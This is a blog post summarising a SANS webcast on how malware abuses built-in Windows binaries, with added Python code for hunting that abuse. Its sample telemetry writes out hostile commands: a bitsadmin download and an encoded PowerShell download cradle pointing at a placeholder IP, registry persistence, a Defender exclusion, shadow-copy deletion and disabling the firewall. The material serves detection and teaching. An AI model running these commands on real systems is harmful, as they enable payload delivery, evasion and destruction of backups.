Living off the Land Binaries, aka LOLBins, represent one of the more creative and insidious malware techniques in use today. Attackers use LOLBins to evade detection by co-opting legitimate system binaries and processes for malicious purposes. This post, condensed from a SANS webcast featuring SANS Analyst Jake Williams and VMRay Sr. Research Analyst Tamas Boczan, explains why malware authors use LOLBins, how they succeed in evading detection, and details the many ways these binaries are being abused.
LOLBins 101
Jake kicked off the webinar with a brief explanation of what LOLBins are, why attackers are using them, and which ones are being most commonly employed by attackers. While these tools have been around for some time, he explained that they have become especially relevant of late saying, “what we’re seeing now is a big push to incorporate LOLBins in the malware itself.”
By way of analogy, Jake compared LOLBins to the hunt for chemical weapons in the Iraq War, making the case that technologies that can be used to manufacture legitimate chemicals can also be used to construct weapons-grade materials — in essence, both function as ‘dual-use technologies’. In a similar fashion, the same tools we rely on to administer Windows systems can also be used for malicious purposes.
As to why attackers are using LOLBins in greater numbers, Jake pointed out their primary motive: to evade and misdirect detection tools. Endpoint Detection & Response (EDR) and Endpoint Protection Platform (EPP) products rely on heuristic thresholds that they tune according to any number of defined parameters, and a single process that downloads a payload, writes persistence and tampers with security settings crosses those thresholds quickly. By splitting the malware's functionality across several separate built-in binaries, each of which looks like routine administration on its own, attackers make heuristic detection that much harder.
“This is why malware reversing and malware analysis is so important in our whole defensive ecosystem – it’s more than just figuring out what the malware does, it’s also about informing our defensive strategies,” said Jake.
Popular Executable Targets of LOLBins
All LOLBin abuse follows essentially the same pattern: the attacker invokes basic administrative binaries that are already present and trusted on the system, which lets them stealthily modify or disable services and settings, establish persistence, and change security configurations without dropping a tool that a scanner would recognize.
In this section, Jake provided an overview of four common executables that are most often co-opted as LOLBins. These include:
- REG.EXE: The command-line registry tool is a foundational component of Windows, and as such it has long been a target for malware authors: it lets them establish persistence through registry Run keys, disable or install services, and modify firewall and security settings that are stored in the registry.
- VSSADMIN.EXE: A default Windows binary that administers the Volume Shadow Copy Service, which keeps point-in-time snapshots of a volume that backups and file recovery rely on. It is a common technique for ransomware to call VSSADMIN.EXE to delete existing shadow copies so that the victim cannot restore their files without paying.
- BITSADMIN.EXE: A Microsoft-signed executable for managing the Background Intelligent Transfer Service, which transfers files in the background. Attackers misuse it as a vehicle to download files, to achieve persistence, or to execute code after a file has been transferred, since a BITS job can be configured to run a command when the transfer completes.
- NETSH.EXE: The NetShell executable is another very common process that attackers use to change firewall and network configuration, for example to disable the Windows Firewall or open ports. As with VSSADMIN.EXE, NetShell is rarely invoked during legitimate use of a workstation, which makes its appearance worth a closer look.
Tamas offered more detail on how stealthy these attacks can be: “by editing the registry, not only can attackers add persistence but they can also add an exclusion to an antivirus like Windows Defender which is probably more effective than turning off the antivirus entirely as it allows the attacker to control the machine with less noise.”
Hunting Attackers Using LOLBins in Malware
LOLBins present a particular challenge for proactive threat hunting because, by their very nature, the execution of a single LOLBin is difficult to classify as malicious on its own. Instead, Jake advises looking closely at the context in which these binaries are executed: the parent and ancestor processes, the order in which the binaries are invoked, and their command lines. Taken together, that context will most likely reveal malicious LOLBin use.
Jake explained further, “If REG.EXE was called with an ancestor process of Explorer or if the execution chain of bitsadmin was invoked, followed by a random EXE name, then VSSADMIN — well that sounds to me like a dropper got put on a machine that then called BITSADMIN to download a file… and then we later saw a random executable name that called VSSADMIN — well then that sounds like that file is ransomware. So I’m following these patterns here to quickly come in and respond, hopefully before there’s catastrophic damage.”
Jake closed by making the case that this is yet another reason for analyzing malware: “through analysis we learn from how this malware was executed and infer how malware in the future is also going to behave so we can create better EDR and better hunting methodologies.”
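The context-based hunting Jake describes, as an added example that is not code from the webcast or from VMRay: it walks constructed Sysmon-style process-creation events (pid, parent pid, image path, command line), rebuilds each process's ancestry, and flags the four binaries from the list above when their command lines look like persistence, shadow-copy deletion, firewall tampering or a download, plus the dropper chain "bitsadmin download, then a random EXE, then vssadmin". The sample events, process names, paths and the 203.0.113.5 address are made up for illustration; the regexes are a starting point, not a complete rule set.

```python
"""Hunting LOLBin abuse by execution context rather than by binary name.

Added example, not code from the webcast or from VMRay.  It walks
constructed Sysmon-style process-creation events (pid, parent pid, image,
command line), rebuilds each process's ancestry and flags the patterns
described above: reg.exe adding a Run key or a Defender exclusion,
vssadmin.exe deleting shadow copies, netsh.exe disabling the firewall,
bitsadmin.exe downloading a file, and the dropper chain
"bitsadmin download -> random EXE -> vssadmin".  Process names, paths
and the IP address are made up for illustration.
"""
import re
from collections import namedtuple

Event = namedtuple("Event", "pid ppid image cmdline")

# Constructed telemetry (not real logs).  pid/ppid link the process tree.
EVENTS = [
    Event(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    # Benign admin use: reg.exe only reads a key, so no rule should fire.
    Event(200, 100, r"C:\Windows\System32\cmd.exe", r"cmd.exe /c reg query HKLM\SOFTWARE\Contoso"),
    Event(201, 200, r"C:\Windows\System32\reg.exe", r"reg query HKLM\SOFTWARE\Contoso"),
    # Suspicious chain: Office -> bitsadmin download -> random EXE -> LOLBins.
    Event(300, 100, r"C:\Program Files\Microsoft Office\WINWORD.EXE", "WINWORD.EXE invoice.docm"),
    Event(301, 300, r"C:\Windows\System32\bitsadmin.exe",
          r"bitsadmin /transfer job /download /priority high http://203.0.113.5/x.bin C:\Users\Public\qzvx.exe"),
    Event(302, 300, r"C:\Users\Public\qzvx.exe", "qzvx.exe"),
    Event(303, 302, r"C:\Windows\System32\reg.exe",
          r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v upd /t REG_SZ /d C:\Users\Public\qzvx.exe /f"),
    Event(304, 302, r"C:\Windows\System32\reg.exe",
          r'reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v C:\Users\Public /t REG_DWORD /d 0 /f'),
    Event(305, 302, r"C:\Windows\System32\vssadmin.exe", "vssadmin delete shadows /all /quiet"),
    Event(306, 302, r"C:\Windows\System32\netsh.exe", "netsh advfirewall set allprofiles state off"),
]

# Command-line patterns that are rarely legitimate on a workstation.
RULES = {
    "reg_run_key_persistence": re.compile(r"\breg(\.exe)?\s+add\b.*\\CurrentVersion\\Run\b", re.I),
    "reg_defender_exclusion": re.compile(r"\breg(\.exe)?\s+add\b.*Windows Defender\\Exclusions", re.I),
    "vssadmin_delete_shadows": re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows\b", re.I),
    "bitsadmin_download": re.compile(r"\bbitsadmin(\.exe)?\s+/transfer\b.*\bhttps?://", re.I),
    "netsh_firewall_off": re.compile(r"\bnetsh(\.exe)?\s+advfirewall\s+set\s+\w+\s+state\s+off\b", re.I),
}
# Destination path is the last token of a bitsadmin /transfer command line.
_BITS_DEST = re.compile(r"https?://\S+\s+(\S+)\s*$", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1]


def ancestry(by_pid, event):
    """[event, parent, grandparent, ...] as far as the telemetry reaches."""
    chain, cur = [], event
    while cur is not None and cur not in chain:
        chain.append(cur)
        cur = by_pid.get(cur.ppid)
    return chain


def hunt_single(events):
    """Per-process hits as (pid, rule, 'explorer.exe > WINWORD.EXE > ...')."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        for rule, rx in RULES.items():
            if rx.search(e.cmdline):
                lineage = " > ".join(basename(a.image) for a in reversed(ancestry(by_pid, e)))
                hits.append((e.pid, rule, lineage))
    return hits


def hunt_dropper_chains(events):
    """Tie a bitsadmin download to a later process whose image is the file
    that was downloaded and which, itself or through a child, deletes shadow
    copies.  Returns (bitsadmin_pid, dropped_exe_pid, vssadmin_pid) tuples."""
    by_pid = {e.pid: e for e in events}
    order = {e.pid: i for i, e in enumerate(events)}
    dropped = {}  # lower-cased destination path -> bitsadmin event
    for e in events:
        m = _BITS_DEST.search(e.cmdline)
        if m and basename(e.image).lower() == "bitsadmin.exe":
            dropped[m.group(1).strip('"').lower()] = e
    chains = []
    for e in events:
        if not RULES["vssadmin_delete_shadows"].search(e.cmdline):
            continue
        for anc in ancestry(by_pid, e):
            src = dropped.get(anc.image.lower())
            if src is not None and order[src.pid] < order[anc.pid]:  # download preceded launch
                chains.append((src.pid, anc.pid, e.pid))
                break
    return chains


if __name__ == "__main__":
    for pid, rule, lineage in hunt_single(EVENTS):
        print(f"{pid:>4}  {rule:<24} {lineage}")
    for bits, exe, vss in hunt_dropper_chains(EVENTS):
        print(f"dropper chain: bitsadmin pid {bits} fetched the image of pid {exe}, which led to vssadmin pid {vss}")
```

The benign `reg query` under cmd.exe produces no hit, while every LOLBin under the dropped `qzvx.exe` is reported with its full lineage back to WINWORD.EXE, and the chain rule ties the bitsadmin download destination to the image of the process that later deleted the shadow copies. In a real pipeline the events would come from Sysmon event ID 1 or EDR process telemetry, and the lineage string is what an analyst would pivot on.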
In the second half of the webinar, Tamas Boczan, VMRay’s Sr. Threat Researcher took a closer technical look at why threat actors are using LOLBins and how they are using them in the wild.
Why Malware Authors are Living Off the Land
Tamas summarizes the three primary reasons why malware authors are leveraging LOLBins:
- Easier Development: Convenient command-line tools, both specialized ones like Reg or NetShell and general high-level interfaces such as PowerShell, are easier for malware authors to use than the raw Windows API.
- Bypassing Application Whitelisting: This security mechanism lets administrators define rules for process creation. Much as with firewall rules, admins can allow or deny the execution of a process under certain conditions, such as the signer of the binary, its path or its command line. Correctly configuring application whitelisting is challenging. If the rules are too restrictive, employees of the organization run into problems during normal use; if the configuration is too permissive, attackers can use living off the land techniques to bypass the restrictions, because the signed Microsoft binaries they abuse are usually allowed.
- Bypassing User Account Control: Since Windows Vista, applications are launched at a restricted (medium) integrity level even when the user is a member of the Administrators group. An application can signal to the system that it needs to run at a higher integrity level, at which point the User Account Control consent prompt appears. To keep the number of prompts low, the default UAC setting since Windows 7 suppresses this prompt under certain conditions (for specific signed Microsoft binaries that are marked for auto-elevation) and elevates the application silently. Those conditions can be triggered through certain LOLBins, allowing attackers to escalate privileges without giving the user a chance to interrupt the execution.
Tamas pointed out, “for the same reason programmers use it, malware developers also use it – the main difference is that programmers have to adhere to some quality standards but malware, of course, has no QA department so they can and will cut corners.”
Other Misused Binaries
Tamas went on to look at a variety of binaries and detail how they are abused as LOLBins. Besides Reg, VssAdmin, NetSh and Bitsadmin discussed earlier, the dual-use binaries misused the most by malware also include:
- CertUtil
- CMSTP
- SchTasks
- InstallUtil
- WMIC
- Powershell
- Cscript
- cmd
- Microsoft Office binaries
Each one of these has a legitimate purpose and, likewise, the potential to be misused by malware. Tamas walks through the intended use case of each and how it can be abused.
For instance, the CertUtil binary is a program for managing the certificates on the system. A typical use case for a company would be importing the company’s signing certificate during install or for listing or verifying certificates.
CertUtil can be misused because it can also verify certificates that are hosted online, which means it will fetch a remote file to disk before it even looks at the content. That makes it a download tool that happens to be signed by Microsoft and present on every Windows install. “Of course before the download the tool cannot know that the file on the remote system may not be a legitimate certificate but it has to download this remote file in order to work with it,” said Tamas.
PowerShell & Other Script Interpreters
The last set of binaries that Tamas reviewed are script interpreters such as:
- cmd which executes batch files
- Powershell which executes Powershell scripts
- Cscript which can execute VBScript and JavaScript
- MS Office which becomes a script interpreter if macros are enabled
Tamas noted, “these are powerful automation tools that are widely used so they might be necessary to whitelist. In malware, they are usually used as downloaders or droppers. Even though they are very powerful, attackers in the malware world usually prefer to implement code in C or .NET or another programming language, and not a scripting language. The script is used as a step to getting that code to execute. Another reason malware authors like to use it besides it being built-in and easy to use is that these scripts are very easy to obfuscate without needing to compile anything. So statically detecting malware in these scripts is very difficult.”
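One of the obfuscation layers Tamas refers to, as an added example that is not code from the webcast or from VMRay: `powershell.exe -EncodedCommand` takes the script as Base64 of UTF-16LE text, so process-creation telemetry shows an opaque blob rather than the download cradle inside it. The block below decodes that layer and lists the download-and-execute keywords it finds. The sample command line is constructed here (encoded with the same helper an attacker's builder would use), the 203.0.113.5 URL is a placeholder, and the keyword list is illustrative rather than exhaustive.

```python
"""Peeling one obfuscation layer off a PowerShell LOLBin command line.

Added example, not code from the webcast or from VMRay.  powershell.exe
-EncodedCommand takes the script as Base64 of UTF-16LE text, so in
process-creation telemetry the script is an opaque blob.  This decodes the
blob and lists the download-and-execute ("cradle") keywords found inside.
The sample command line is constructed here (encoded with the same helper
an attacker's builder would use); the URL is a placeholder address.
"""
import base64
import re

# Constructed sample: a classic one-line download cradle.
SCRIPT = "$w=New-Object Net.WebClient;IEX $w.DownloadString('http://203.0.113.5/s.ps1')"


def encode_command(script):
    """What an attacker's builder does: UTF-16LE text, then Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


SAMPLE_CMDLINE = "powershell.exe -nop -w hidden -enc " + encode_command(SCRIPT)

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec,
# -enc, ...), so match "-e<letters>" followed by a long Base64 token.
_ENC = re.compile(r"(?:^|\s)-e[a-z]*\s+([A-Za-z0-9+/=]{20,})", re.I)

# Illustrative, not exhaustive: tokens that mark a download-and-run cradle.
CRADLE_KEYWORDS = [
    "New-Object", "Net.WebClient", "DownloadString", "DownloadFile",
    "Invoke-WebRequest", "Invoke-Expression", "IEX", "Start-Process",
    "FromBase64String",
]


def decode_encoded_command(cmdline):
    """Return the script hidden behind -EncodedCommand, or None when there
    is no encoded command or the token is not valid Base64 / UTF-16LE."""
    m = _ENC.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        text = raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None
    # Real scripts are printable; random bytes that happen to decode are not.
    if not all(c.isprintable() or c in "\r\n\t" for c in text):
        return None
    return text


def cradle_indicators(script):
    """Sorted list of cradle keywords present in the decoded script."""
    found = [k for k in CRADLE_KEYWORDS
             if re.search(r"(?<![\w-])" + re.escape(k) + r"(?![\w-])", script, re.I)]
    return sorted(found)


def analyze(cmdline):
    """One record a hunting pipeline could emit for a powershell.exe event."""
    script = decode_encoded_command(cmdline)
    return {
        "hidden_window": bool(re.search(r"\s-w(?:indowstyle)?\s+hidden\b", cmdline, re.I)),
        "no_profile": bool(re.search(r"\s-nop(?:rofile)?\b", cmdline, re.I)),
        "decoded": script,
        "indicators": cradle_indicators(script) if script else [],
    }


if __name__ == "__main__":
    for key, value in analyze(SAMPLE_CMDLINE).items():
        print(f"{key:<14} {value}")
```

This strips only the outermost layer; attackers routinely nest string concatenation, `-join`, character-code arrays or a second Base64 stage inside the decoded script, which is exactly why Tamas says static detection of these scripts is hard and why a sandbox that observes what the interpreter actually does is the more reliable check. Decoding still pays off, because `-w hidden` plus `-nop` plus any cradle keyword is a strong signal regardless of what sits under the next layer.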
To learn more about LOLBins, watch the full webcast: A Wolf in Sheep’s Clothing: Dissecting Living Off the Land Binaries.